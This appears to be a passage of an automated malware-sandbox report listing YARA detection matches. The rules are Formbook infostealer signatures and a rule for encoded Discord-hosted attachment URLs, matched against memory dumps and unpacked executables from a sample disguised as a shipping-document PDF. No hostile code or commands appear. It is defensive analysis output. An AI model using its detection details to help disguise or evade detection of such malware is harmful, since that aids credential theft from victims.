Source: 1.2.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.2.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 12.2.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 11.1.Original Shipment Doc Ref 2853801324189923,PDF.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 17.1.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 18.0.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 18.1.Nyedvqj.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 14.0.Nyedvqj.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000C.00000002.321929561.0000000000473000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000001.291686637.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000003.270904610.0000000003C8C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.298456001.0000000000473000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000C.00000000.293835698.0000000000471000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000E.00000000.311802519.0000000000471000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000003.321247558.0000000003D30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.323136617.0000000002760000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.337416597.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.340669316.0000000000473000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000E.00000003.314083607.0000000002E64000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000012.00000000.339113202.0000000000471000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.301666823.0000000003B9C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.530165789.0000000003416000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000011.00000000.320572808.0000000000471000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000003.299620122.0000000002D34000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000001.00000000.260851932.0000000000471000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.302136605.0000000003D00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.352491116.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.299850141.00000000028B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.302308233.0000000003D70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.342364275.0000000002540000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000C.00000002.325589114.0000000003CAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000B.00000000.289777084.0000000000471000.00000008.00020000.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000000.337058358.0000000007387000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.342777768.0000000002E18000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.368626024.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000003.291200860.0000000003DAC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000003.262859681.0000000002E84000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 00000001.00000002.300537676.0000000002E38000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.370946797.00000000006C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000C.00000002.323669387.0000000002CE8000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000B.00000002.369875714.0000000000690000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Original Shipment Doc Ref 2853801324189923,PDF.exe PID: 5904, type: MEMORYSTR	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
Source: Process Memory Space: Nyedvqj.exe PID: 6664, type: MEMORYSTR	Matched rule: SUSP_Encoded_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
